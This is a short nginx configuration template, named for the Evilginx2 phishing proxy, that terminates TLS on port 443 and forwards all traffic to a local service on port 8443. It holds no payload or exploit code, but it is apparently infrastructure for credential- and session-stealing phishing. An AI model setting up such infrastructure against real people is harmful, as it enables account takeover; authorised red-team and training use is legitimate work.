server {
        listen 443 ssl;
        server_name evilginx2.template;

        ssl_certificate ;
        ssl_certificate_key ;
        ssl_trusted_certificate ;

        include /etc/nginx/*.rules;
        include /etc/nginx/conf.d/*.conf;
        # Add index.php to the list if you are using PHP
        location / {
                # First attempt to serve request as file, then
                # as directory, then fall back to displaying a 404.
                proxy_pass https://127.0.0.1:8443/;
                include proxy_params;
        }

}
